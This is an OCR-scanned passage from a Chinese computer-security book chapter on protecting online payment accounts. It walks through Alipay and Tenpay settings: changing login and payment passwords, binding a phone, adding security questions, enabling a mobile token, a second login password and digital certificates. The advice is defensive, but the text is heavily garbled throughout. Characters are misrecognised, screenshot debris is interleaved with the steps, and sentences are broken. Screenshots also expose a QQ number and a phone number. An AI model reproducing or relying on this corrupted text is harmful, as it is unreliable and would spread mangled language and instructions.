此 蜜 但 的 重要 性 不 言 而 喻 。 长 时 间 使 用 单一 的 密码 很 容易 导致 密 但 泄露 或 被 四 客人 破译 ， 
此 定期 修改 密码 非常 重要 。 下 面 介 绍 修改 文 付 宝 登录 密码 的 具体 操作 步骤 。 
STEP01: 进入 支付 宝 首 页 STEP02: 登录 支付 宝 


























全 PD- 80o| 司 支 H 宇 045 付 ! 
站 > ES 了 了 I 具 (O)~ 全- 四 用 已 品 电 芭 回 固 
口 手机 支付 宝 


”Alipaycom 
第 三 方 电子 支付 平台 

















在 IE 浏览 器 地 址 栏 中 输入 “www.alipay.com ” 输入 用 户 名 和 密码 后 单 击 “登录 ”按钮 。 
后 按 <Enter> 键 。 
STEP03: 打开 新 的 页 面 STEP04: 打开 “安全 管家 "页面 


El 


您 的 账户 安全 等 级 :中 ( 


为 账户 更 安全 ， 推 荐 您 : ”数字 证 书 安装 数字 证 书后 ， 了 即使 密码 被 盗 ， 对 方 也 不 能 使 用 您 的 账户 资金 


上 次 登录 时 间 : 2014 年 01 月 13 日 14:04:11 
保护 登录 密码 和 支付 密码 安全 

仿 保护 中 您 # 定 的 手机 : 

和食 保护 中 订阅 系统 消息 第 一 时 间 了 解 您 在 支付 宝 交 易 杖 态 的 变更 


您 已 设置 1 个 安全 保护 问题 


售 保护 中 。 实 店 认 1 您 已 通过 实名 认证 





fe 2 | fcTEB 


单 击 页 面 顶部 的 “安全 中 心 ” 链 接 。 单 击 “ 保 护 账户 安 在 “登录 密码 ” 右 侧 
全 ”选项 卡 。 单 击 “ 修 改 ” 链 接 。 
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咱 19 时 
保障 网 络 文 付 工具 的 安全 
STEP05: 第 二 种 修改 登录 密码 方式 STEP06: 修改 密码 


快速 入 口 
更 改 登录 密码 
@ 定期 更换 密码 可 以 让 您 的 账户 更 加 安全 。 


， 请 确保 登录 密码 与 支付 密码 不 同 ! 
"建议 密码 采用 字母 和 数字 混合 ， 并 且 不 息 于 6 位 。 如 何 设 置 安全 密码 


* 当前 密码 : Fe 
* 新 密码 : Fe 
* 确认 新 密码 : aaa 





在 “安全 管家 ”页 面 左 下 角 单 击 “ 修 改 登录 密码 ”。 根据 提示 输入 当前 密码 及 新 密码 后 ， 单 击 “ 确 认 ” 


按钮 。 
STEP07: 密码 修改 成 功 
您 的 新 登录 密码 修改 成 功 ! 密码 修改 成 功 提 示 信 息 。 


今后 将 使 用 产 登 录 密 码 来 登录 支付 宝 账 己 ， 倩 牛 记 。 
您 可 能 需要 : 陈 回 我 的 支付 宝 





2. 绑 定 于 机 
绑 定 手机 功能 能 够 使 文 付 军 的 安全 性 提高 很 多 ， 文 付 宝 账户 与 手机 绑 定 后 ， 用 户 还 能 
够 随时 随地 修改 密码 ， 保 证 账户 安全 。 下 面 介 绍 绑 定 手机 的 具体 操作 步骤 。 


STEP01: 打开 “安全 管家 ”页 面 STEP02: 选择 绑 定 方式 
性 位 宇 | 绑 定 手机 


您 正在 为 账户 ***x##*x@qq.com 绑 定 手机 ， 请 选择 绑 定 方式 : 








s 


为 账户 更 安全 ， 推 荐 您 : 字 安装 数字 证 书后 ， 即 使 密码 被 盗 ， 对 方 也 不 能 使 用 您 的 账户 资金 


保护 资金 安全 保护 隐 科 安全 


加 保护 中 St 上 次 登录 时 间 : 2014 年 01 月 13 日 14:58:14 


侠 保护 中 车 招 保护 登录 密码 和 支付 密码 安全 


人 通过 支付 密码 外 


傅 保护 中 订阅 系统 消息 第 一 时 间 了 解 您 在 支付 宝 交易 状态 的 变更 


图 未 使 用 # 绪 定 手机 后 可 以 使 用 手机 找 回 密码 等 服务 
图 未 使 用 9 [可 是 用 于 找 回 密码 、 手 机 绪 定 、 开 启 余额 支 付 和 数字 证 书 等 


图 未 使 用 次 视 认 1 认证 您 的 网 络 身份 ， 账 户 更 被 信任 





加 切换 至 “保护 账户 贺 单 击 “手机 绑 定 ” 右 侧 ”选择 “通过 支付 密码 ” ， 然 后 单 击 “ 立 即 绑 定 ” 按 


安全 ”选项 卡 。 的 “ 绑 定 ” 链 接 。 钮 。 


匡 
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攻防 从 入 门 到 精通 


ll 





全 人 人 他 
STEP03: 输入 支付 密码 STEP04: 填写 手机 号 码 以 及 验证 码 


必 付 宝 | 绑 定 手机 


,| 绑 定 手机 


验证 身份 


@ 您 正在 使 用 "支付 密码 " 验证 身份 ， 请 填写 以 下 信息 : @ 乡 定 手机 是 免费 的 ,我 们 不 会 泄漏 您 的 手机 信息 。 


支付 密码 [ee ”忘记 支付 密码 ? 


站。 重新 运 后 3 证 方式 





在 文本 框 中 输入 支付 密码 后 ， 单 击 “ 下 一 步 ” 按 在 文本 框 中 输入 手机 号 码 后 ， 根 据 发 送 到 手机 上 的 
钮 。 信息 填写 验证 码 ， 然 后 单 击 “ 确 定 ” 按 钮 。 


STEP05: 手机 绑 定 成 功 


性 付 宝 .| 敌 定 于 机 


© 绑 定 成 功 ， 手 机 号 码 汶 * 六 六 六 六 六 玉米 六 六 六 
此 手机 号 可 用 于 找 回 密码 ， 重 襄 安保 问题 等 服务 手机 绑 定 成 功 提示 信息 。 


查看 手机 服务 ， 返回 我 的 支付 主 





3. 设置 安全 保护 问题 
设置 安全 保护 问题 ， 可 以 使 文 付 叹 账户 更 加 安全 。 下 面 介绍 设置 安全 你 护 问 题 的 具体 
操作 步 又 。 


STEP01: 打开 “安全 管家 ”页 面 STEP02: 添加 安保 问题 





为 账户 更 安全 ， 推 荐 您 : 数字 证 书 安装 数字 证 书后 ， 即 使 密码 被 盗 ， 对方 也 不 能 使 用 您 的 账户 资金 性 付 福 | 湛 加 安 保 问题 


您 正在 为 账户 337***@qq.com 添加 安保 问题 ， 请 选择 添加 方式 : 
上 次 登录 时 间 : 2014 年 01 月 13 日 14:58:14 


作 保护 中 时 保护 悟 录 密 码 和 支付 密码 支 全 轩 ,， 通 过 "手机 校 验 码 + 支付 窗 码 "和 


食 保护 中 订阅 系统 消息 第 一 时 间 了 解 您 在 支付 宝 交 易 状 态 的 变更 


人 @ 未 使 用 机 绪 定 手机 后 ， 可 以 使 用 手机 找 回 密码 等 服务 
和食 未 使 用 4 问题 。 ”用 于 找 回 密码 、 手 机 绪 定 、 开 启 余额 支付 和 数字 证 书 等 


@ 未 使 用 中 认证 认证 您 的 网 络 身份 ， 账 户 更 被 信任 





国 切换 至 “保护 账户 国 在 “安全 保护 问题 ” 右 。 提示 通过 “手机 校 验 码 + 支 付 密码 ”的 方式 进行 添 
安全 ”选项 卡 。 侧 单 击 “ 设 置 ” 链 接 。 加 ， 单 击 “ 立 即 添加 ”按钮 。 
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STEP03: 验证 身份 


验证 身份 添加 安保 问题 


全 您 正在 使 用 "于 机 校 验 码 + 支 付 密码 ”验证 身份 ， 请 填写 以 下 信息 : 


手机 号 码 。** 六 六 六 六 六 六 冰 六 六 


校 验 码 没收 到 短信 校 验 码 ?9 


支付 密码 | 忘记 支付 室 码 ? 


下 一 消 重新 选择 验证 方式 


输入 校 验 码 及 支付 密码 后 单 击 “下 一 步 ” 按 钮 。 


STEP05: 确认 安全 保护 问题 及 答案 信息 


验证 身份 添加 安保 问题 


@ 安全 保护 问题 将 作为 重要 的 身份 验证 方式 ， 请 确认 ! 


我 外 婆 的 名 字 是 
我 分 分 的 名 字 是 


我 奶奶 的 名 字 是 


确定 


确认 无 误 后 单 击 “ 确 定 ” 按 钮 。 








保障 网 络 支 付 工 具 的 安全 


STEP04: 填写 安全 保护 问题 及 答案 


@ 安全 保护 问题 将 作为 重要 的 身份 验证 方式 ， 请 认真 设置 ! 


问题 一 我 | 四 站 下 | 的 | 名字 








答案 | xx 





问题 二 我 | 爷爷 





管 案 | X0C 





问题 三 我 | 奶奶 Y | 的 | 名字 


答 夫 | Xoo 
安保 问 缠 答 案 不 能 重生 


填写 问题 一 、 问 题 二 、 问 题 三 以 及 答案 后 单 击 “ 下 
一 步 ”按钮 。 


STEP06: 安保 问题 添加 成 功 


dE ] 添加 安保 问题 


全 添 加 成 功 ， 请 牢记 安全 保护 问题 答案 


返回 我 的 支付 宝 


安全 保护 问题 虽然 不 经 常 使 用 ， 但 是 仍 存在 泄露 的 危险 ， 为 了 保证 用 户 的 


je 示 账户 安全 ， 建 议定 期 修改 安全 保护 问题 ， 可 以 3 个 月 修改 一 次 . 





18.1.2 ”加 强 文 付 宝 内 资金 的 安全 防护 











一 般 情 况 下 ， 用 户 不 会 将 大 量 资金 丰 接 存在 文 付 宇 内 ， 而 古 在 使 用 时 先 通过 银行 卡 将 
资金 存 入 文 付 宝 账户 中 ， 然 后 通过 支付 宇文 付 。 但 当 支 付 宇 中 存 有 一 定量 的 资金 时 ， 丈 要 
注意 文 付 宝 的 安全 问题 ， 以 防 他 人 人 盗 取 。 尤 其 现在 很 多 用 户 开通 了 余额 宇 功 能 ， 不 再 需要 
通过 银行 卡 转账 ， 可 以 直接 从 余额 宝 残 可 文 付 ， 安 全 问题 驶 更 应 该 注意 。 
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= Me 
全- 攻防 从 入 门 到 精通 
全 人 人 他 


1， 定 期 修改 支付 密码 

支付 密码 与 登录 密码 不 同 ， 登 录 密 码 是 在 登录 支付 宝 账户 时 所 输入 的 密码 ， 而 支付 窗 
码 是 使 用 支付 宝 进行 资金 支付 时 所 输入 的 密码 。 一 旦 密码 被 他 人 知晓 ， 账 户 里 的 资金 将 会 
被 他 人 盗 取 。 下 面 介 绍 修改 支付 宝 支付 密码 的 具体 操作 步 又 。 


STEP01: 登录 支付 宝 账户 STEP02: 打开 “安全 管家 "页面 

















轩 国 二 和 支 人 宇 。 去 全 中 心 帮助 中 心 天 本 53 


保护 中 支付 密码 付 吉 或 修改 账户 信息 时 和 输入， 保护 账户 资金 支 全 





保护 中 ”余额 支付 余额 支付 功能 : 开 


保护 中 无线 支付 无 线 支付 功能 : 开 《用 支付 宝 客户 党 支付 、 手 机 回复 短信 方式 来 付款 》 


保护 中 支付宝 风险 监控 。 能 实时 监控 您 的 账户 和 交易 异常 ， 一 旦 发 现 异 常 ， 会 及 时 通知 到 你 


短信 校 验 服务 。 ”设置 每 笔 支 付 或 每 日 支付 超过 额度 时 ， 需 要 校 验 手机 


数字 证 书 安装 元 字 证 书后 ， 即 使 密码 被 姿 ， 对 方 也 不 能 使 用 您 的 账户 资金 


宝 令 (手机 版 ) 宝 令 ( 手 机 版 每 30 秒 更 新 一 次 动态 口令 ， 付款 时 输入 可 保护 资金 安全 





支付 后 支付 盾 是 数字 证 书 的 升级 ， 实 现 随时 随地 更 安全 
在 支付 宝 首页 顶部 单 击 “安全 中 心 ”链接 。 切换 至 “保护 资金 在 “支付 密码 ”五 例 
安全 ”选项 卡 。 单 击 “ 修 改 ” 链 接 。 
STEP03: 更 改 支付 密码 STEP04: 支付 密码 修改 成 功 


ws 或 付 宝 | 作 改 支付 客 码 


建议 密码 采用 字母 和 数字 混合 ,并 且 不 短 于 6 位 。 如 何 设置 安全 密码 9 


账户 名 *****x*@qq.com 
人 设置 成 功 ， 请 牢记 新 的 支付 密码 
当前 支付 密码 Fe 找 回 支付 密码 


和 局 一 一 一 
新 支付 密码 | 1 返回 我 的 支付 宝 
光 须 是 6-20 个 英文 字母 、 数 字 或 竹 号 ， 不 能 是 纯 数 字 或 十 字母 


确认 新 支付 客 码 | 





输入 当前 支付 密码 及 新 支付 密码 后 ， 单 击 “确认 ” ”查看 设置 成 功 的 提示 信息 。 并 且 会 向 用 户 所 填写 的 
按钮 。 邮箱 发 送 支付 宝 支付 密码 修改 报告 。 


2. 开通 宝 令 〈 手 机 版 ) 

宝 令 〈 手 机 版 ) 是 由 文 付 宝 推 出 的 ， 是 免费 安装 在 手机 客户 端 上 的 基于 动态 口令 的 
安全 认证 产品 。 申 请 成 功 后 ， 在 用 户 进 行 付款 、 确 认 收 货 每 关键 操作 时 显示 6 位 动态 密 
人 码 ， 安 全 方便 ， 确 保 用 户 的 账户 资金 更 加 安全 。 下 而 介绍 开通 宝 令 ( 手 机 版) 的 具体 操 


作 步 又 。 
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STEPO1: 


打开 “安全 管家 ”页 面 


保护 账户 安全 保护 隐私 安全 


支付 密码 


短信 校 验 服务 


余额 支付 


无 线 支付 


付款 或 修改 账户 信息 时 坦 入 ， 保 护 账户 资金 支 全 


您 当前 的 设置 : 每 笔 支 付 都 需要 手机 校 验 
2014-01-12 14:44 已 扣 款 0.60 元 ， 下 次 扣 款 时 间 2014-02-12 和 @ 


余额 支付 功能 : 开 


无 线 支付 功能 : 开 《用 支付 宝 客户 端 支付 、 手 机 回复 短信 方式 来 付 


保障 网 络 支付 工具 的 安全 


STEP02: 下 载 支付 宝 客户 端 


支付 宇 - 手 机 宇 令 


第 1 步 下 载 文 付 宇 客 尸 端 


支付 宝 风险 监控 。 能 实时 监控 您 的 账户 和 交易 异常 ,一 旦 发 现 异常 ， 会 及 时 通知 到 你 
数字 证 书 安装 数字 证 书后 ， 即 使 密码 被 咨 ， 对 方 也 不 能 使 用 您 的 账户 资金 
宝 令 (手机 版 ) 宝 令 人 手机 版 每 30 秒 更 新 一 次 动态 口令 ， 付 教 时 输入 可 保护 资金 安全 


支付 盾 支付 盾 是 数字 证 书 的 升级 ， 实 现 随时 随地 更 去 全 





切换 至 “保护 资 ” 较 在 “ 宝 令 (手机 版 )” 
金 安 全 ”选项 卡 。 右 侧 单 击 “ 申 请 ”链接 。 


STEP03: 开启 手机 宝 邻 


根据 手机 类 型 单 击 相应 按钮 下 载 支 付 宝 客户 端 。 


属 证 期 更 换 密码 可 以 让 你 的 账户 更 加 安全 
请 确保 登录 密码 与 支付 密码 不 同 


! * 
建议 密布 采用 字母 和 数字 混合 ,并 且 不 短 于 6 位 。 如 何 设置 安全 密码 


eco 在 手机 上 安装 支付 宝 客户 端 后 ， 依 次 进行 以 下 
操作 : 打开 “支付 宝 钱包 ”， 依 次 单 击 “ 安 


当前 支付 密码 找 回 支付 密码 
FF 全 ”> “手机 宝 令 ” > “开启 ”， 即 完 总 万 瑚 。 


新 支付 密码 Fe | 


必须 是 6-20 个 莫 女 字母、 元 字 或 符号 ,不 能 星 二 救 字 或 二 字母 


确认 新 支付 多 ee | 





手机 宝 令 开启 成 功 后 ， 在 计算 机 上 付款 时 ， 手 机 宝 令 上 会 显示 动态 口 
提示 按 口令 输入 方 可 付款 ， 这 样 可 以 保证 支付 宝 内 资金 更 加 安全 。 


Ap; :站 


3) 
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攻防 从 入 门 到 精通 





3. 安装 数字 证 书 

数字 证 书 是 一 个 经 证 书 授权 中 心 数字 签名 的 包含 公开 密 钥 及 其 拥有 者 信息 的 文件 。 使 
用 了 数字 证 书 ， 即 使 用 户 发 送 的 信息 在 网 上 被 他 人 截获 ， 甚 至 丢失 了 个 人 的 账户 、 密 码 等 
信息 ， 仍 可 以 保证 账户 、 资 金 安 全 。 申 请 数字 证 书后 ， 用 户 只 能 在 安装 了 数字 证 书 的 计算 
机 上 支付 。 当 用 户 更 换 计算 机 或 重 装 系统 后 ， 只 需 用 手机 校 验 即 可 重新 安装 数字 证 书 ， 所 
以 使 用 数字 证 书 要 确保 文 付 宝 绑 定 的 手机 可 以 正 党 使用。 下面 介 绍 安装 数字 证 书 的 具体 操 



































作 步 又 。 


STEP01: 打开 “安全 管家 ”页 面 


保护 账户 安全 。 ”保护 隐 旭 安全 


支付 密码 付款 或 修改 账户 信息 时 输入 ， 保 护 账 户 资金 安全 


余额 支付 余额 支付 功能 : 开 
无 线 支付 


无 线 支付 功能 : 开 《用 支付 宝 客户 端 支付 、 手 机 回复 短信 方式 来 付款 


支付 宝 风险 监控 。 能 实时 监控 您 的 账户 和 交易 异常 ， 一 旦 发现 异常 ， 会 及 时 通知 到 你 


短信 校 验 服务 


设置 每 笔 支付 或 每 日 支付 超过 额度 时 ， 需 要 校 验 手机 
数字 证 书 安装 数字 证 书后 ， 即 使 密码 被 盗 ， 对 方 也 不 能 使 用 您 的 账户 资金 


宝 令 ( 手 机 版 每 30 种 更 新 一 次 动态 口令 ， 付款 时 输入 可 保护 资金 安全 


支付 盾 是 数字 证 书 的 升级 ， 实 现 随时 随地 更 安全 


切换 至 “保护 资金 国 在 “数字 证 书 ” 右 侧 单 
安全 ”选项 卡 。 击 “ 申 请 ”链接 。 


STEP03: 填写 身份 证 号 等 信息 


* 您 绑 定 的 手机 与 码 :不 直 本 相 # 相 站 志 本 丰 下: 更 换 号 码 
请 确认 您 的 手机 能 够 正常 使 用 ;为 了 保障 您 的 账户 安全 ， 在 不 同 的 


真实 姓名 
身份 证 号 码 : 


请 填 入 与 您 真实 姓名 一 到 的 身份 证 号 码 


来 求 求 来 末 求 来 求 来 来 求 - 


使 用 地 点 : [办 公 室 YJ 


当 您 在 不 同 的 电脑 上 安装 了 证 书 时 ， "使 用 地 成 方便 您 查看 、 暗 除 趟 


看 不 清 ， 换 一 ? 


验证 码 : Lbw2 


请 输入 图 片 验证 码 
| 提交 


填写 身份 证 号 、 使 用 地 点 等 相关 信息 ， 单 击 “ 提 
交 ”按钮 。 
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STEP02: 申请 数字 证 书 


数字 证 书 《免费 ) 
申请 后 ， 账 户 安全 等 级 为 : 高 
申请 数字 证 书后 ， 只 能 在 安装 数字 证 书 的 电脑 上 支付 。 当 您 换 电 脑 或 重 凌 


系统 时 ， 只 需 用 手机 核 妈 可 重新 安装 糙 字 证 忆 ， 所 以 确保 您 在 支付 宝 绑 
定 的 手机 可 以 正常 使 用 。 


支持 的 提 作 系统 


i 人 








查看 数字 证 书 相 关 介 
按钮 。 


i 绍 ， 单 击 “ 申 请 数字 证 书 ” 


STEP04: 进行 手机 验证 


故 支付 宇 已 经 向 您 的 手机 *********. 免 费 发 送 了 一 条 校 验 短信 ， 请 输入 短信 内 的 校 验 码 。 
" 如 此 手机 不 能 正常 接收 短信 ， 您 可 以 更 搞 手 机 号 码 


手机 号 码 二 二 趟 主 咎 二 主 二 不 二 主 、 
支付 宝 已 回 此 手机 家 送 了 梓 验 码 短 信 ， 请 查看 您 的 手机 短信 ! 


* 校 验 码 : 1611995| 


如 果 1 分 钟 内 没有 收 到 校 输 把 信 ， 您 可 以 重新 获取 ， 此 服务 
《12 秒 后 ) 重新 获取 夫 仿 


根据 手机 上 接收 到 的 校 验 码 进行 填写 
“确定 ”按钮 。 


与 ， 然 后 单 击 





保障 网 络 支付 工具 的 安全 


STEP05: 安装 证 书 控件 


一 证 羽 控 件 正 在 升 雏 
i 可 能 需要 一 些 时 间 ， 请 稍 候 .… 


正在 安装 证 书 .… | 本寺 二 本 二 二 加 加 加 ”| 


可 看 到 安装 进度 ， 安 装 完 成 后 即 可 使 用 。 





关于 支付 宝 | 官方 博客 | 碱 征 英 才 | 联系 我 们 | 玫 


支付 宝 版 权 所 有 2004-2014 








堵 付 通 的 安全 防护 


财 付 通 是 腾讯 公司 推出 的 专业 在 线 文 付 平 侣 ， 其 核心 业务 是 帮助 在 互联 网 上 进行 交易 
的 双方 完成 文 付 和 收 葡 。 个 人 用 户 注 册 财 付 通 后 ， 可 在 拍 担 网 及 多 家 购物 网 站 进行 购物 。 
财 付 通 文 持 全 国 各 大 银行 的 网 银 文 付 ， 用 户 也 可 以 移 充 值 到 财 付 通 ， 孚 受 更 加 便捷 的 财 付 
通 余额 文 付 体验 。 














18.2.1 加强 财 付 通 账户 的 安全 防护 


财 付 通 和 支付 宝 一 样 ， 保 障 安全 是 非常 重要 的 。 常 用 的 财 付 通 账 户 安 全 防护 方法 有 缘 
定 手 机 、 启 用 实名 认证 设置 二 次 登录 和 密码， 以 及 定期 修改 登录 密码 等 。 

1. 绪 定 手机 

使 用 财 付 通 绑 定 手机 功能 后 ， 用 户 可 以 随时 随地 修改 账户 密码 ， 保 障 账 户 安全 。 下 面 
介绍 绑 定 手机 的 具体 操作 步骤 。 


STEP01: 打开 IE 浏览 器 STEP02: 进入 拍 拍 网 首页 














买 | 找 的 担 担 ~ | 购物 车 








[FETED 失 折 和 


Fa FE 
女装 ”男装 数码 运动 美 妆 ”家 居 美食 








在 IE 浏 览 器 地 址 栏 中 输入 “www.paipai.com” 后 ， 在 拍 拍 网 首页 项 部 单 击 “ 我 的 拍 拍 ” 链 接 。 
按 < Enter > 键 。 
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取 
新 


攻防 从 入 门 到 精通 


;= > 





全 人 人 他 
STEP03: 登录 STEP04: 进入 个 人 用 户 首页 


我 要 买 我 的 拍 拍 ” 购物 车 | 财 付 前 | 帮助 > 


亲 末 站 卡 冰冰 下 末了] 





忘 了 密码 9? ”| 注册 新 帐号 | 意见 尽 局 
在 文本 框 中 输入 QOQ 号 和 密码 ， 单 击 “ 登 录 ” 按 钮 。 在 页 面 项 部 单 击 “ 财 付 通 ”链接 。 
STEP05: 进入 我 的 账户 页 面 STEP06: 查看 “未 启用 的 保护 "列表 








人 未 启用 的 保护 (9 项 ) 
答 信 通知 账户 信息 及 资金 变动 ， 立 即 发 送 答 信 通 知 
绪 定 手机 轻松 找 回 支付 密 码 


晚上 好 ， 王 明明 (1013047750) 帐户 ; 


邮件 通知 资金 变动 ， 发 送 邮 件 通知 您 
会 员 等 级 : 网 0 世 


数字 证 书 使 用 帐户 资金 的 身份 名 证 
账户 未 额 : 0 元 次 登录 洪 重 密码 验证 ， 双 重 安全 保障 


交易 记录 : ”人 最 近况 易 记录 同步 狂 定 QQ 手机 令 牌 ， 账 户 动态 尽 在 掌握 
QQ 快 付 


认证 ，6 们 动态 口令 
刷卡 支付 权威 认证 ，6 位 动态 口令 保护 账户 安全 





在 页 面 左 侧 单 击 “ 安 全 中 心 ”选项 。 单 击 绑 定 手 机 右 侧 的 “启用 ”按钮 
STEP07: 绑 定 手机 STEP08: 填写 验证 码 


革 定 手机 绪 定 手机 


四 ”验证 码 短 信 已 点 送 到 您 的 手机 136””” “60 我 想 换 号 
a 请 填写 验证 码 : 没有 收 到 验证 码 v 
手机 号 码 : | 13693641260 请 输入 手机 号 码 


支付 密码 : ET 忘 了 ? 


此 服务 免费 ， 下 一 步 将 点 二 一 条 验证 码 想 信和 到 您 的 手机 。 








根据 提示 填写 手机 号 码 及 支付 密码 ， 然 后 单 击 “ 下 ”根据 发 送 到 手机 上 的 信息 填写 验证 码 并 单 击 “ 确 
up 按钮 。 定 ” 按钮 。 
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< 第 18 章 





保障 网 络 文 付 工 具 的 安全 





STEP09: 成功 绑 定 手 机 STEP10: 返回 查看 “已 启用 的 保护 ”列表 
2 已 启用 的 保护 (5 项 ) 
短信 通知 账户 信息 及 资金 变动 ， 立 即 故 送 短 信 通 知 
QQ 首 知 亢 金 变动 ，QQ 会 弹出 消息 通知 您 
支付 密码 赂 户 资 金 尽 重 要 资料 变更 时 需 核验 


敏感 信息 保护 保护 手机 号 码 、 银行 卡号 等 敏感 信息 





查看 提示 信息 。 可 以 看 到 该 列表 中 已 包含 “ 绑 定 手机 ”选项 。 

2. 设置 二 次 登录 密码 

在 财 付 通 中 ,可 设置 二 次 登录 密码 以 加 强 财 付 通 账 户 的 安全 。 设置 了 二 次 登录 密码 后 ， 
OR a 
人 全。 下面 介绍 设置 二 次 登录 密码 的 具体 操作 步骤 。 
STEP01: 查看 “未 启用 的 保护 ”列表 STEP02: 启用 二 次 登录 密码 


和 @ 未 启用 的 保护 (9 项 ) 二 次 登录 密码 ”功能 介绍 

















短信 通知 账户 信息 及 资金 变动 ， 立 即 发 送 短信 通知 
您 正在 为 财 付 通 账号 2538015827 启用 二 次 登录 密码 。 


绪 定 手机 轻松 找 回 支付 密码 下 一 步 将 发 送 验证 码 炬 信 到 您 账户 线 定 的 手机 136 ”60 更换 慎 
邮件 通知 资金 变动 ， 发 送 邮 件 通知 您 当前 夫 让 的 手机 ， | 296" 60 | WF 





使 用 账户 资金 的 身份 凭证 


双重 密码 验证 ， 汉 重 安全 保障 


同步 绪 定 QQ 手机 令 牌 ,账户 动态 尽 在 掌握 








权威 让 证 ， 6 位 动态 口令 保护 账户 安全 





单 击 “ 二 次 登录 密码 ” 右 侧 的 “启用 ”按钮 。 填写 手机 号 及 验证 码 ， 单 击 “ 下 一 步 ” 按 钮 。 
STEP03: 填写 验证 码 STEP04: 二 次 登录 密码 启用 成 功 


二 次 登录 密码 。 功能 介绍 启 用 


验证 码 短信 已 发 送 到 您 的 手机 136******60 重 换 手机 二 次 登录 密码 启用 成 功 
ym. i aa 
请 填写 验证 码 : | 034228 。 ”| 没有 收 到 验证 码 v 下 次 登录 财 付 通 时 需 验 证 此 密码 ， 请 牢记 此 密码 


] 上 一 ` 训 DD 来 玉 来 来 六 来 | 
| 2 





请 再 输入 一 遍 ， x** 





填写 验证 码 及 二 次 登录 密码 ， 单 击 “ 确 定 ” 按钮。 查看 提示 信息 并 单 击 “确定 ”按钮 。 
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E33 
最 > 
攻防 从 入 门 到 精通 


次 登录 密码 要 与 登录 密码 有 所 不 同 ， 以 防止 财 付 通 账户 被 轻易 破解 。 





3. 定期 修改 登录 密码 
登录 密码 长 时 间 不 变更 束 会 有 丢失 或 者 锌 破解 的 风险 ， 因 此 定期 修改 登录 密码 非常 必 
要 。 下 和 面 介绍 修改 密码 的 具体 操作 步 又 。 


STEP01: 打开 财 付 通 账户 首页 STEP02: 切换 至 “密码 管理 ”选项 卡 


几 010j ) 刷 会 x 付 会 生活 


@ 安全 检查 € 支 全 监控 国 en 


支付 密码 : 账户 资金 支出 《如 购 均 、 付 款 、 提 现 ) 或 资料 变更 时 ， 需 先 验证 支付 密码 
修改 支付 密码 | 找 回 支付 密码 

我 的 帐户 晚上 好 ， 王 明 极 (1013047750) 账户; 

本 a 去 装 密码 控件 后 ， 防 止 病毒 木马 盗 取 支付 密码 ， 提 升 安 全 等 级 。 

会 只 寺 豚 : v re 本 机 已 安装 版 本 : 2.0.2.0 (已 经 是 最 新 版 本 ) 


区 匈 查 询 


转帐 付款 a 


交易 记录 : ”他 最 近 交 易 记 录 ~ 


密 保 信 息 是 个 人 身份 的 有 效 任 焉 ， 帮 助 您 快速 找 回 支付 密码 





00 快 付 在 登录 财 付 通 时 使 用 
刷卡 支付 境外 支付 


在 页 面 左 侧 单 击 “ 安 全 中 心 ”。 单 击 “ 登 录 密 码 ” 右 侧 的 “修改 ”按钮 。 
STEP03: 跳 转 至 QQ 安全 中 心 密码 管理 界面 STEP04: QQ 窗 码 修改 成 功 





密码 管理 > 修改 密码 


密码 由 6-16 个 字符 组 成 ， 区 分 大 小 写 ( 不 能 是 9 位 以 下 的 纯 数 字 ， 不 能 包 合 空格 ) 


为 了 提升 您 的 密码 安全 性 ， 建 议 使 用 英文 字母 加 数字 或 符 呈 的 混合 密码 


您 还 可 以 得 看 QQ 的 登录 记录 和 了 改 密 记录 咯 " 


查看 改 密 记 录 


填写 当前 密码 、 新 密码 及 验证 码 ， 单 击 “ 确 定 - 查看 提示 信息 ， 单 击 “ 查 看 改 密 记 录 ” 按 钮 可 查看 
按钮 。 QQ 密码 修改 记录 。 


请 输入 图 中 字符 ， 不 区 分 大 小 写 


2 





18:2.2 ”加 强 财 付 遂 内 资金 的 安全 防护 


当 财 付 通 中 存 有 一 定量 的 资金 时 ， 就 要 注意 账户 内 资金 的 安全 问题 ， 以 防 他 人 盗 取 。 
常用 的 防护 措施 有 定期 修改 支付 密码 和 启用 数字 证 书 。 

1， 定 期 修改 支付 密码 

使 用 财 付 通 进行 充值 、 支 付 、 提 现 操 作 时 ， 需 要 输入 支付 密码 。 下 面 介绍 通过 修改 支 
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付 密码 的 其 体 步 又 。 
STEP01: 打开 财 付 通 首页 


Ra 
见 卫 11 ) 刷 会 x 付 会 生活 


我 的 账户 晚上 好 ， 王 明丽 (1013047750) ， 账户 ; 





会 员 等 级 : 顺 0 包 
交易 查询 电 


转帐 付款 账户 作 闫 : (0] 二 


快捷 支付 
QQ 快 付 
刷卡 支付 境 州 支付 


单 击 页 面 左 侧 的 “安全 中 心 ”。 


交易 记录 : ”人 最 近 交 易 记录 Y 


STEP03: 进入 密码 管理 界面 


大 | 关外 


账户 资金 支出 《如 购物 、 付 款 、 提 现 》 或 资料 变更 时 ， 需 先 验证 支付 密 


修改 支付 密码 | 找 回 支付 密码 


安装 密码 控件 后 ， 防 止 病毒 木马 盗 取 支 付 密 码 ， 提 升 安全 等 级 。 


本 机 也 安装 版 本 : 2.0.2.0 (已 经 是 最 新 版 本 》 


密 保 上 息 是 个 人 身份 的 有 效 任 证 ， 帮 助 您 快速 找 回 支付 密码 


单 击 “ 修 改 支 付 密码 ”链接 。 


STEP05: 支付 密码 修改 成 功 


修改 友和 付 密码 


芭 付 密码 修改 成 功 ! 


支付 密码 是 称 的 重要 账户 依 息 ， 收 付款 、 提 














STEP02: 查看 “已 启用 的 保护 "列表 


人 @ 已 启用 的 保护 (6 项 ) 


账户 信息 及 资金 变动 ,立即 胡适 短信 通知 
乡 定 手机 轻 疤 找 回 支付 密码 
QQ 通知 资金 变动 ，QQ 会 绊 出 消息 通知 您 


支付 密码 账户 资金 及 重要 资料 变更 时 需 核 验 


二 次 登录 密码 汉 重 密友 验 焉 ， 观 重 安 全 保障 


敏感 信息 保护 保护 手机 号码 、 银行 卡号 等 敏感 信息 


单 击 “ 支 付 密码 ”选项 。 
修改 支付 密码 





STEPO4: 


修改 支付 密码 


当前 支付 密码 ， Fk 冰冰 六 六 冰冰 阔 读 玫 
新 支付 密友 : [kk 冰冰 | 
十 给 入 一 次 : [kkkk 


填写 当前 支付 密码 、 新 支付 密码 ， 然 后 单 击 “ 确 定 ” 
按钮 。 


不 要 与 登录 密码 相同 


密码 长 度 6-16 位 ,可 
和 下 划 续 组 成 ， 黄 女 : 


查看 提示 信息 。 
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NTZI 一 > 





攻防 从 入 门 到 精通 


沸 尖 [ 





全 人 人 他 
2. 启用 数字 证 书 
财 付 通 中 的 数字 证 书 拥有 与 文 付 宝 中 的 数字 证 书 同样 的 功能 ， 都 是 用 于 保护 账户 内 的 
